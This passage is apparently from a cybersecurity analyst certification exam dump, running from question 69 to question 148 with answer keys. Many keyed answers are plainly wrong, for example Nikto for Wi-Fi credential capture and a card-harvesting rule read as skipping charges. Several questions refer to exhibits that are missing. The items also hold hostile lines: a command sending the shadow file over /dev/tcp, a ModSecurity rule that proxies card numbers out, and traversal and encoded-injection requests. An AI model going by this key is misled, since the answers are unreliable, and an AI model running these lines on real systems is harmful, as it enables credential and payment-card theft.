B. Implement a CASB.
C. Virtualize the server.
D. Air gap the server.

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 69
A cybersecurity analyst is currently checking a newly deployed server that has an access control list
applied. When conducting the scan, the analyst received the following code snippet of results:

Which of the following describes the output of this scan?

A. The analyst has discovered a False Positive, and the status code is incorrect providing an OK
message.
B. The analyst has discovered a True Positive, and the status code is correct providing a file not found
error message.
C. The analyst has discovered a True Positive, and the status code is incorrect providing a forbidden
message.
D. The analyst has discovered a False Positive, and the status code is incorrect providing a server error
message.

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 70
A system's authority to operate (ATO) is set to expire in four days. Because of other activities and limited
staffing, the organization has neglected to start reauthentication activities until now. The cybersecurity
group just performed a vulnerability scan with the partial set of results shown below:

Based on the scenario and the output from the vulnerability scan, which of the following should the security
team do with this finding?

A. Remediate by going to the web config file, searching for the enforce HTTP validation setting, and
manually updating to the correct setting.
B. Accept this risk for now because this is a "high" severity, but testing will require more than the four
days available, and the system ATO needs to be competed.
C. Ignore it. This is false positive, and the organization needs to focus its efforts on other findings.
D. Ensure HTTP validation is enabled by rebooting the server.

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 71
An organization suspects it has had a breach, and it is trying to determine the potential impact. The
organization knows the following:
The source of the breach is linked to an IP located in a foreign country. The breach is isolated to the
research and development servers. The hash values of the data before and after the breach are
unchanged. The affected servers were regularly patched, and a recent scan showed no vulnerabilities.

Which of the following conclusions can be drawn with respect to the threat and impact? (Choose two.)

A. The confidentiality of the data is unaffected.

B. The threat is an APT.
C. The source IP of the threat has been spoofed.
D. The integrity of the data is unaffected.
E. The threat is an insider.

Correct Answer: BD
Explanation

Explanation/Reference:

QUESTION 72
A system is experiencing noticeably slow response times, and users are being locked out frequently. An
analyst asked for the system security plan and found the system comprises two servers: an application
server in the DMZ and a database server inside the trusted domain. Which of the following should be
performed NEXT to investigate the availability issue?

A. Review the firewall logs.

B. Review syslogs from critical servers.
C. Perform fuzzing.
D. Install a WAF in front of the application server.

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 73
Ann, a user, reports to the security team that her browser began redirecting her to random sites while
using her Windows laptop. Ann further reports that the OS shows the C: drive is out of space despite
having plenty of space recently. Ann claims she not downloaded anything. The security team obtains the
laptop and begins to investigate, noting the following:

File access auditing is turned off.

When clearing up disk space to make the laptop functional, files that appear to be cached web pages are
immediately created in a temporary directory, filling up the available drive space. All processes running
appear to be legitimate processes for this user and machine. Network traffic spikes when the space is
cleared on the laptop.
No browser is open.

Which of the following initial actions and tools would provide the BEST approach to determining what is
happening?

A. Delete the temporary files, run an Nmap scan, and utilize Burp Suite.
B. Disable the network connection, check Sysinternals Process Explorer, and review netstat output.
C. Perform a hard power down of the laptop, take a dd image, and analyze with FTK.
D. Review logins to the laptop, search Windows Event Viewer, and review Wireshark captures.

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 74
A security architect is reviewing the options for performing input validation on incoming web form
submissions. Which of the following should the architect as the MOST secure and manageable option?

A. Client-side whitelisting
B. Server-side whitelisting
C. Server-side blacklisting
D. Client-side blacklisting

Correct Answer: B
Explanation
Explanation/Reference:

QUESTION 75
A security administrator needs to create an IDS rule to alert on FTP login attempts by root. Which of the
following rules is the BEST solution?

A. Option A
B. Option B
C. Option C
D. Option D

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 76
The computer incident response team at a multinational company has determined that a breach of
sensitive data has occurred in which a threat actor has compromised the organization's email system. Per
the incident response procedures, this breach requires notifying the board immediately. Which of the
following would be the BEST method of communication?

A. Post of the company blog

B. Corporate-hosted encrypted email
C. VoIP phone call
D. Summary sent by certified mail
E. Externally hosted instant message

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 77
During an investigation, an incident responder intends to recover multiple pieces of digital media. Before
removing the media, the responder should initiate:

A. malware scans.
B. secure communications.
C. chain of custody forms.
D. decryption tools.

Correct Answer: C
Explanation
Explanation/Reference:

QUESTION 78
A malicious hacker wants to gather guest credentials on a hotel 802.11 network. Which of the following
tools is the malicious hacker going to use to gain access to information found on the hotel network?

A. Nikto
B. Aircrak-ng
C. Nessus
D. tcpdump

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 79
A security analyst received an email with the following key:
Xj3XJ3LLc

A second security analyst received an email with following key:

3XJ3xjcLLC

The security manager has informed the two analysts that the email they received is a key that allows
access to the company's financial segment for maintenance. This is an example of:

A. dual control
B. private key encryption
C. separation of duties
D. public key encryption
E. two-factor authentication

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 80
Which of the following is the BEST way to share incident-related artifacts to provide non-repudiation?

A. Secure email
B. Encrypted USB drives
C. Cloud containers
D. Network folders

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 81
A security analyst has a sample of malicious software and needs to know what the sample does? The
analyst runs the sample in a carefully controlled and monitored virtual machine to observe the software
behavior. Which of the following malware analysis approaches is this?

A. White box testing

B. Fuzzing
C. Sandboxing
D. Static code analysis

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 82
An analyst is reviewing a list of vulnerabilities, which were reported from a recent vulnerability scan of a
Linux server.
Which of the following is MOST likely to be a false positive?

A. OpenSSH/OpenSSL Package Random Number Generator Weakness

B. Apache HTTP Server Byte Range DoS
C. GDI+ Remote Code Execution Vulnerability (MS08-052)
D. HTTP TRACE / TRACK Methods Allowed (002-1208)
E. SSL Certificate Expiry

Correct Answer: E
Explanation

Explanation/Reference:

QUESTION 83
A security analyst, who is working for a company that utilizes Linux servers, receives the following results
from a vulnerability scan:

Which of the following is MOST likely a false positive?

A. ICMP timestamp request remote date disclosure

B. Windows SMB service enumeration via \srvsvc
C. Anonymous FTP enabled
D. Unsupported web server detection

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 84
Which of the following should be found within an organization's acceptable use policy?

A. Passwords must be eight characters in length and contain at least one special character.
B. Customer data must be handled properly, stored on company servers, and encrypted when possible
C. Administrator accounts must be audited monthly, and inactive accounts should be removed.
D. Consequences of violating the policy could include discipline up to and including termination.
Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 85
An analyst identifies multiple instances of node-to-node communication between several endpoints within
the 10.200.2.0/24 network and a user machine at the IP address 10.200.2.5. This user machine at the IP
address 10.200.2.5 is also identified as initiating outbound communication during atypical business hours
with several IP addresses that have recently appeared on threat feeds. Which of the following can be
inferred from this activity?

A. 10.200.2.0/24 is infected with ransomware.

B. 10.200.2.0/24 is not routable address space.
C. 10.200.2.5 is a rogue endpoint.
D. 10.200.2.5 is exfiltrating data.

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 86
A system administrator is doing network reconnaissance of a company's external network to determine the
vulnerability of various services that are running. Sending some sample traffic to the external host, the
administrator obtains the following packet capture:

Based on the output, which of the following services should be further tested for vulnerabilities?

A. SSH
B. HTTP
C. SMB
D. HTTPS

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 87
Ransomware is identified on a company's network that affects both Windows and MAC hosts. The
command and control channel for encryption for this variant uses TCP ports from 11000 to 65000. The
channel goes to good1. Iholdbadkeys.com, which resolves to IP address 72.172.16.2. Which of the
following is the MOST effective way to prevent any newly infected systems from actually encrypting the
data on connected network drives while causing the least disruption to normal Internet traffic?

A. Block all outbound traffic to web host good1 iholdbadkeys.com at the border gateway.
B. Block all outbound TCP connections to IP host address 172.172.16.2 at the border gateway.
C. Block all outbound traffic on TCP ports 11000 to 65000 at the border gateway.
D. Block all outbound traffic on TCP ports 11000 to 65000 to IP host address 172.172.16.2 at the border
gateway.

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 88
A human resources employee sends out a mass email to all employees that contains their personnel
records. A security analyst is called in to address the concern of the human resources director on how to
prevent this from happening in the future.
Which of the following would be the BEST solution to recommend to the director?

A. Install a data loss prevention system, and train human resources employees on its use. Provide PII
training to all employees at the company. Encrypt PII information.
B. Enforce encryption on all emails sent within the company. Create a PII program and policy on how to
handle data. Train all human resources employees.
C. Train all employees. Encrypt data sent on the company network. Bring in privacy personnel to present
a plan on how PII should be handled.
D. Install specific equipment to create a human resources policy that protects PII data. Train company
employees on how to handle PII data. Outsource all PII to another company. Send the human
resources director to training for PII handling.

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 89
Risk management wants IT to implement a solution that will permit an analyst to intercept, execute, and
analyze potentially malicious files that are downloaded from the Internet. Which of the following would
BEST provide this solution?

A. File fingerprinting
B. Decomposition of malware
C. Risk evaluation
D. Sandboxing

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 90
Joe, a penetration tester, used a professional directory to identify a network administrator and ID
administrator for a client's company. Joe then emailed the network administrator, identifying himself as the
ID administrator, and asked for a current password as part of a security exercise. Which of the following
techniques were used in this scenario?

A. Enumeration and OS fingerprinting

B. Email harvesting and host scanning
C. Social media profiling and phishing
D. Network and host scanning

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 91
A web developer wants to create a new web part within the company website that aggregates sales from
individual team sites. A cybersecurity analyst wants to ensure security measurements are implemented
during this process. Which of the following remediation actions should the analyst take to implement a
vulnerability management process?

A. Personnel training
B. Vulnerability scan
C. Change management
D. Sandboxing

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 92
A security team is implementing a new vulnerability management program in an environment that has a
historically poor security posture. The team is aware of issues patch management in the environment and
expects a large number of findings. Which of the following would be the MOST efficient way to increase
the security posture of the organization in the shortest amount of time?

A. Create an SLA stating that remediation actions must occur within 30 days of discovery for all levels of
vulnerabilities.
B. Incorporate prioritization levels into the remediation process and address critical findings first.
C. Create classification criteria for data residing on different servers and provide remediation only for
servers housing sensitive data.
D. Implement a change control policy that allows the security team to quickly deploy patches in the
production environment to reduce the risk of any vulnerabilities found.

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 93
Which of the following is the use of tools to simulate the ability for an attacker to gain access to a specified
network?

A. Reverse engineering
B. Fuzzing
C. Penetration testing
D. Network mapping

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 94
A company just chose a global software company based in Europe to implement a new supply chain
management solution. Which of the following would be the MAIN concern of the company?
A. Violating national security policy
B. Packet injection
C. Loss of intellectual property
D. International labor laws

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 95
An employee in the billing department accidentally sent a spreadsheet containing payment card data to a
recipient outside the organization The employee intended to send the spreadsheet to an internal staff
member with a similar name and was unaware of the mistake until the recipient replied to the message In
addition to retraining the employee, which of the following would prevent this from happening in the future?

A. Implement outgoing filter rules to quarantine messages that contain card data
B. Configure the outgoing mail filter to allow attachments only to addresses on the whitelist
C. Remove all external recipients from the employee's address book
D. Set the outgoing mail filter to strip spreadsheet attachments from all messages.

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 96
A security analyst was alerted to a tile integrity monitoring event based on a change to the vhost-
paymonts .conf file The output of the diff command against the known-good backup reads as follows

SecRule ARGS:Card "@rx ([0-9]+" "id:123456,pass,capture,proxy:https://10.0.0.128/%

(matched_var),nolog,noauditlog"

Which of the following MOST likely occurred?

A. The file was altered to accept payments without charging the cards
B. The file was altered to avoid logging credit card information
C. The file was altered to verify the card numbers are valid.
D. The file was altered to harvest credit card numbers

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 97
A security analyst recently discovered two unauthorized hosts on the campus's wireless network segment
from a man-m-the-middle attack .The security analyst also verified that privileges were not escalated, and
the two devices did not gain access to other network devices Which of the following would BEST mitigate
and improve the security posture of the wireless network for this type of attack?

A. Enable MAC filtering on the wireless router and suggest a stronger encryption for the wireless network,
B. Change the SSID, strengthen the passcode, and implement MAC filtering on the wireless router.
C. Enable MAC filtering on the wireless router and create a whitelist that allows devices on the network
D. Conduct a wireless survey to determine if the wireless strength needs to be reduced.
Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 98
A security analyst is investigating a malware infection that occurred on a Windows system. The system
was not connected to a network and had no wireless capability Company policy prohibits using portable
media or mobile storage The security analyst is trying to determine which user caused the malware to get
onto the system Which of the following registry keys would MOST likely have this information?

A. HKEY_USERS\<user SID>\Software\Microsoft\Windows\CurrentVersion\Run
B. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
C. HKEY_USERS\<user SID>\Software\Microsoft\Windows\explorer\MountPoints2
D. HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\eventlog\System\iusb3hub

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 99
Which of the following MOST accurately describes an HSM?

A. An HSM is a low-cost solution for encryption.

B. An HSM can be networked based or a removable USB
C. An HSM is slower at encrypting than software
D. An HSM is explicitly used for MFA

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 100
A security analyst is investigating malicious traffic from an internal system that attempted to download
proxy avoidance software as identified from the firewall logs but the destination IP is blocked and not
captured. Which of the following should the analyst do?

A. Shut down the computer

B. Capture live data using Wireshark
C. Take a snapshot
D. Determine if DNS logging is enabled.
E. Review the network logs.

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 101
Which of the following technologies can be used to house the entropy keys for disk encryption on desktops
and laptops?

A. Self-encrypting drive
B. Bus encryption
C. TPM
D. HSM

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 102
A developer wrote a script to make names and other Pll data unidentifiable before loading a database
export into the testing system Which of the following describes the type of control that is being used?

A. Data encoding
B. Data masking
C. Data loss prevention
D. Data classification

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 103
A security analyst receives an alert that highly sensitive information has left the company's network Upon
investigation, the analyst discovers an outside IP range has had connections from three servers more than
100 times m the past month The affected servers are virtual machines Which of the following is the BEST
course of action?

A. Shut down the servers as soon as possible, move them to a clean environment, restart, run a
vulnerability scanner to find weaknesses determine the root cause, remediate, and report
B. Report the data exfiltration to management take the affected servers offline, conduct an antivirus scan,
remediate all threats found, and return the servers to service.
C. Disconnect the affected servers from the network, use the virtual machine console to access the
systems, determine which information has left the network, find the security weakness, and remediate
D. Determine if any other servers have been affected, snapshot any servers found, determine the vector
that was used to allow the data exfiltration. fix any vulnerabilities, remediate, and report.

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 104
A security analyst is investigating a compromised Linux server. The analyst issues the ps command and
receives the following output.

Which of the following commands should the administrator run NEXT to further analyze the compromised
system?
A. strace /proc/1301
B. rpm -V openash-server
C. /bin/la -1 /proc/1301/exe
D. kill -9 1301

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 105
A small organization has proprietary software that is used internally. The system has not been well
maintained and cannot be updated with the rest of the environment

Which of the following is the BEST solution?

A. Virtualize the system and decommission the physical machine.

B. Remove it from the network and require air gapping.
C. Only allow access to the system via a jumpbox
D. Implement MFA on the specific system.

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 106
Which of the following attacks can be prevented by using output encoding?

A. Server-side request forgery

B. Cross-site scripting
C. SQL injection
D. Command injection
E. Cross-site request forgery
F. Directory traversal

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 107
A security analyst is responding to an incident on a web server on the company network that is making a
large number of outbound requests over DNS Which of the following is the FIRST step the analyst should
take to evaluate this potential indicator of compromise'?

A. Run an anti-malware scan on the system to detect and eradicate the current threat
B. Start a network capture on the system to look into the DNS requests to validate command and control
traffic.
C. Shut down the system to prevent further degradation of the company network
D. Reimage the machine to remove the threat completely and get back to a normal running state.
E. Isolate the system on the network to ensure it cannot access other systems while evaluation is
underway.
Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 108
A security analyst conducted a risk assessment on an organization's wireless network and identified a
high-risk element in the implementation of data confidentially protection. Which of the following is the
BEST technical security control to mitigate this risk?

A. Switch to RADIUS technology

B. Switch to TACACS+ technology.
C. Switch to 802 IX technology
D. Switch to the WPA2 protocol.

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 109
A security analyst discovers accounts in sensitive SaaS-based systems are not being removed in a timely
manner when an employee leaves the organization To BEST resolve the issue, the organization should
implement:

A. federated authentication
B. role-based access control.
C. manual account reviews
D. multifactor authentication.

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 110
As a proactive threat-hunting technique, hunters must develop situational cases based on likely attack
scenarios derived from the available threat intelligence information. After forming the basis of the scenario,
which of the following may the threat hunter construct to establish a framework for threat assessment?

A. Critical asset list

B. Threat vector
C. Attack profile
D. Hypothesis

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 111
A new on-premises application server was recently installed on the network. Remote access to the server
was enabled for vendor support on required ports, but recent security reports show large amounts of data
are being sent to various unauthorized networks through those ports. Which of the following configuration
changes must be implemented to resolve this security issue while still allowing remote vendor access?
A. Apply a firewall application server rule.
B. Whitelist the application server.
C. Sandbox the application server.
D. Enable port security.
E. Block the unauthorized networks.

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 112
An organization wants to move non-essential services into a cloud computing environment. Management
has a cost focus and would like to achieve a recovery time objective of 12 hours. Which of the following
cloud recovery strategies would work BEST to attain the desired outcome?

A. Duplicate all services in another instance and load balance between the instances.
B. Establish a hot site with active replication to another region within the same cloud provider.
C. Set up a warm disaster recovery site with the same cloud provider in a different region
D. Configure the systems with a cold site at another cloud provider that can be used for failover.

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 113
As part of a merger with another organization, a Chief Information Security Officer (CISO) is working with
an assessor to perform a risk assessment focused on data privacy compliance. The CISO is primarily
concerned with the potential legal liability and fines associated with data privacy. Based on the CISO's
concerns, the assessor will MOST likely focus on:

A. qualitative probabilities.
B. quantitative probabilities.
C. qualitative magnitude.
D. quantitative magnitude.

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 114
An organization needs to limit its exposure to accidental disclosure when employees send emails that
contain personal information to recipients outside the company Which of the following technical controls
would BEST accomplish this goal?

A. DLP
B. Encryption
C. Data masking
D. SPF

Correct Answer: A
Explanation

Explanation/Reference:
QUESTION 115
During a routine log review, a security analyst has found the following commands that cannot be identified
from the Bash history log on the root user.

1. Line 1 logger keeping track of my activity

2. Line 2 tail -l /vvar/log/syslog
3. Lino 3 lvextend -L +50G /dev/volg1/secret
4. Line 4 rm -rf1 /tmp/DFt5Gsd3
5. Line 5 cat /etc/s*w> /dev/tcp/10.0.0.1/8080
6. Line 6 yum install httpd --assumeyes

Which of the following commands should the analyst investigate FIRST?

A. Line 1
B. Line 2
C. Line 3
D. Line 4
E. Line 5
F. Line 6

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 116
A company recently experienced a break-in whereby a number of hardware assets were stolen through
unauthorized access at the back of the building. Which of the following would BEST prevent this type of
theft from occurring in the future?

A. Motion detection
B. Perimeter fencing
C. Monitored security cameras
D. Badged entry

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 117
A security analyst wants to identify which vulnerabilities a potential attacker might initially exploit if the
network is compromised Which of the following would provide the BEST results?

A. Baseline configuration assessment

B. Uncredentialed scan
C. Network ping sweep
D. External penetration test

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 118
As part of a review of modern response plans, which of the following is MOST important for an
organization lo understand when establishing the breach notification period?

A. Organizational policies
B. Vendor requirements and contracts
C. Service-level agreements
D. Legal requirements

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 119
A security analyst gathered forensics from a recent intrusion in preparation for legal proceedings. The
analyst used EnCase to gather the digital forensics. cloned the hard drive, and took the hard drive home
for further analysis. Which of the following of the security analyst violate?

A. Cloning procedures
B. Chain of custody
C. Hashing procedures
D. Virtualization

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 120
An executive assistant wants to onboard a new cloud based product to help with business analytics and
dashboarding. When of the following would be the BEST integration option for the service?

A. Manually log in to the service and upload data files on a regular basis.
B. Have the internal development team script connectivity and file translate to the new service.
C. Create a dedicated SFTP sue and schedule transfers to ensue file transport security
D. Utilize the cloud products API for supported and ongoing integrations

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 121
While analyzing logs from a WAF, a cybersecurity analyst finds the following:

"GET /form.php?id=463225%2b%2575%256e%2569%256f%256e%2b%2573%2574%
2box3133333731,1223,1224&name=&state=IL"

Which of the following BEST describes what the analyst has found?

A. This is an encrypted GET HTTP request

B. A packet is being used to bypass the WAF
C. This is an encrypted packet
D. This is an encoded WAF bypass

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 122
A security analyst at a technology solutions firm has uncovered the same vulnerabilities on a vulnerability
scan for a long period of time. The vulnerabilities are on systems that are dedicated to the firm's largest
client.
Which of the following is MOST likely inhibiting the remediation efforts?

A. The parties have an MOU between them that could prevent shutting down the systems
B. There is a potential disruption of the vendor-client relationship
C. Patches for the vulnerabilities have not been fully tested by the software vendor
D. There is an SLA with the client that allows very little downtime

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 123
A security analyst working in the SOC recently discovered Balances m which hosts visited a specific set of
domains and IPs and became infected with malware. Which of the following is the MOST appropriate
action to take in the situation?

A. implement an IPS signature for the malware and update the blacklisting for the associated domains
and IPs
B. Implement an IPS signature for the malware and another signature request to Nock all the associated
domains and IPs
C. Implement a change request to the firewall setting to not allow traffic to and from the IPs and domains
D. Implement an IPS signature for the malware and a change request to the firewall setting to not allow
traffic to and from the IPs and domains

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 124
The inability to do remote updates of certificates. keys software and firmware is a security issue commonly
associated with:

A. web servers on private networks.

B. HVAC control systems
C. smartphones
D. firewalls and UTM devices

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 125
A security manager has asked an analyst to provide feedback on the results of a penetration lest. After
reviewing the results the manager requests information regarding the possible exploitation of
vulnerabilities Much of the following information data points would be MOST useful for the analyst to
provide to the security manager who would then communicate the risk factors to senior management?
(Select TWO)

A. Probability
B. Adversary capability
C. Attack vector
D. Impact
E. Classification
F. Indicators of compromise

Correct Answer: AD
Explanation

Explanation/Reference:

QUESTION 126
Which of the following are components of the intelligence cycle? (Select TWO.)

A. Collection
B. Normalization
C. Response
D. Analysis
E. Correction
F. Dissension

Correct Answer: BE
Explanation

Explanation/Reference:

QUESTION 127
Which of the following would a security engineer recommend to BEST protect sensitive system data from
being accessed on mobile devices?

A. Use a UEFl boot password.

B. Implement a self-encrypted disk.
C. Configure filesystem encryption
D. Enable Secure Boot using TPM

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 128
A cybersecurity analyst needs to rearchitect the network using a firewall and a VPN server to achieve the
highest level of security To BEST complete this task, the analyst should place the:

A. firewall behind the VPN server

B. VPN server parallel to the firewall
C. VPN server behind the firewall
D. VPN on the firewall

Correct Answer: B
Explanation
Explanation/Reference:

QUESTION 129
Which of the following technologies can be used to house the entropy keys for task encryption on desktops
and laptops?

A. Self-encrypting drive
B. Bus encryption
C. TPM
D. HSM

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 130
A company's modem response team is handling a threat that was identified on the network Security
analysts have as at remote sites. Which of the following is the MOST appropriate next step in the incident
response plan?

A. Quarantine the web server

B. Deploy virtual firewalls
C. Capture a forensic image of the memory and disk
D. Enable web server containerization

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 131
A security analyst is reviewing the following web server log:

GET %2f..%2f..%2f.. %2f.. %2f.. %2f.. %2f../etc/passwd

Which of the following BEST describes the issue?

A. Directory traversal exploit

B. Cross-site scripting
C. SQL injection
D. Cross-site request forgery

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 132
A company's marketing emails are either being found in a spam folder or not being delivered at all. The
security analyst investigates the issue and discovers the emails in question are being sent on behalf of the
company by a third party, mail.marketing.com. Below is the existing SPF record:

v=spf1 a mx -all
Which of the following updates to the SPF record will work BEST to prevent the emails from being marked
as spam or blocked?

A. v=spf1 a mx redirect:mail.marketing.com ?all

B. v=spf1 a mx include:mail.marketing.com -all
C. v=spf1 a mx +all
D. v=spf1 a mx include:mail.marketing.com ~all

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 133
A cybersecurity analyst is supposing an incident response effort via threat intelligence. Which of the
following is the analyst MOST likely executing?

A. Requirements analysis and collection planning

B. Containment and eradication
C. Recovery and post-incident review
D. Indicator enrichment and research pivoting

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 134
An organization has several system that require specific logons Over the past few months, the security
analyst has noticed numerous failed logon attempts followed by password resets. Which of the following
should the analyst do to reduce the occurrence of legitimate failed logons and password resets?

A. Use SSO across all applications

B. Perform a manual privilege review
C. Adjust the current monitoring and logging rules
D. Implement multifactor authentication

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 135
An analyst has been asked to provide feedback regarding the control required by a revised regulatory
framework At this time, the analyst only needs to focus on the technical controls. Which of the following
should the analyst provide an assessment of?

A. Tokenization of sensitive data

B. Establishment o' data classifications
C. Reporting on data retention and purging activities
D. Formal identification of data ownership
E. Execution of NDAs

Correct Answer: A
Explanation
Explanation/Reference:

QUESTION 136
A security analyst has discovered suspicious traffic and determined a host is connecting to a known
malicious website. The MOST appropriate action for the analyst to take would be lo implement a change
request to:

A. update the antivirus software

B. configure the firewall to block traffic to the domain
C. add the domain to the blacklist
D. create an IPS signature for the domain

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 137
A security analyst is supporting an embedded software team. Which of the following is the BEST
recommendation to ensure proper error handling at runtime?

A. Perform static code analysis.

B. Require application fuzzing.
C. Enforce input validation
D. Perform a code review

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 138
A security analyst has discovered trial developers have installed browsers on all development servers in
the company's cloud infrastructure and are using them to browse the Internet.

Which of the following changes should the security analyst make to BEST protect the environment?

A. Create a security rule that blocks Internet access in the development VPC
B. Place a jumpbox m between the developers' workstations and the development VPC
C. Remove the administrator profile from the developer user group in identity and access management
D. Create an alert that is triggered when a developer installs an application on a server

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 139
A threat feed notes malicious actors have been infiltrating companies and exfiltration data to a specific set
of domains Management at an organization wants to know if it is a victim Which of the following should the
security analyst recommend to identity this behavior without alerting any potential malicious actors?

A. Create an IPS rule to block these domains and trigger an alert within the SIEM tool when these
domains are requested
B. Add the domains to a DNS sinkhole and create an alert m the SIEM toot when the domains are queried
C. Look up the IP addresses for these domains and search firewall logs for any traffic being sent to those
IPs over port 443
D. Query DNS logs with a SIEM tool for any hosts requesting the malicious domains and create alerts
based on this information

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 140
A cybersecurity analyst is reading a daily intelligence digest of new vulnerabilities The type of vulnerability
that should be disseminated FIRST is one that:

A. enables remote code execution that is being exploited in the wild.

B. enables data leakage but is not known to be m the environment
C. enables lateral movement and was reported as a proof of concept
D. affected the organization in the past but was probably contained and eradicated

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 141
A security analyst implemented a solution that would analyze the attacks that the organization's firewalls
failed to prevent. The analyst used the existing systems to enact the solution and executed the following
command:
S sudo nc -1 -v -c maildemon . py 25 caplog, txt
Which of the following solutions did the analyst implement?

A. Log collector
B. Crontab mail script
C. Snikhole
D. Honeypot

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 142
A large software company wants to move source control and deployment pipelines into a cloud-
computing environment. Due to the nature of the business management determines the recovery time
objective needs to be within one hour. Which of the following strategies would put the company in the
BEST position to achieve the desired recovery time?

A. Establish an alternate site with active replication to other regions

B. Configure a duplicate environment in the same region and load balance between both instances
C. Set up every cloud component with duplicated copies and auto scaling turned on
D. Create a duplicate copy on premises that can be used for failover in a disaster situation

Correct Answer: A
Explanation

Explanation/Reference:
QUESTION 143
A finance department employee has received a message that appears to have been sent from the Chief
Financial Officer (CFO) asking the employee to perform a wife transfer Analysis of the email shows the
message came from an external source and is fraudulent. Which of the following would work BEST to
improve the likelihood of employees quickly recognizing fraudulent emails?

A. Implementing a sandboxing solution for viewing emails and attachments

B. Limiting email from the finance department to recipients on a pre-approved whitelist
C. Configuring email client settings to display all messages in plaintext when read
D. Adding a banner to incoming messages that identifies the messages as external

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 144
A security analyst discovered a specific series of IP addresses that are targeting an organization. None of
the attacks have been successful. Which of the following should the security analyst perform NEXT?

A. Begin blocking all IP addresses within that subnet.

B. Determine the attack vector and total attack surface.
C. Begin a kill chain analysis to determine the impact.
D. Conduct threat research on the IP addresses

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 145
A security analyst is investigating a system compromise. The analyst verities the system was up to date on
OS patches at the time of the compromise. Which of the following describes the type of vulnerability that
was MOST likely expiated?

A. Insider threat
B. Buffer overflow
C. Advanced persistent threat
D. Zero day

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 146
An organization that handles sensitive financial information wants to perform tokenization of data to enable
the execution of recurring transactions. The organization is most interested m a secure, built- in device to
support its solution. Which of the following would MOST likely be required to perform the desired function?

A. TPM
B. eFuse
C. FPGA
D. HSM
E. UEFI
Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 147
During an incident, a cybersecurity analyst found several entries in the web server logs that are related to
an IP with a bad reputation. Which of the following would cause the analyst to further review the incident?

A. BadReputationIp - - [2019-04-12 10:43Z] "GET /etc/passwd" 403 1023

B. BadReputationIp - - [2019-04-12 10:43Z] "GET /index.html?src=../.ssh/id_rsa" 401 17044
C. BadReputationIp - - [2019-04-12 10:43Z] "GET /a.php?src=/etc/passwd" 403 11056
D. BadReputationIp - - [2019-04-12 10:43Z] "GET /a.php?src=../../.ssh/id_rsa" 200 15036
E. BadReputationIp - - [2019-04-12 10:43Z] "GET /favicon.ico?src=../usr/share/ icons" 200 19064

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 148
An analyst is investigating an anomalous event reported by the SOC After reviewing the system logs the
analyst identifies an unexpected addition of a user with root-level privileges on the endpoint. Which of the
following data sources will BEST help the analyst to determine whether this event constitutes an incident?

A. Patching logs
B. Threat feed
C. Backup logs
D. Change requests
E. Data classification matrix

Correct Answer: D
Explanation

Explanation/Reference:

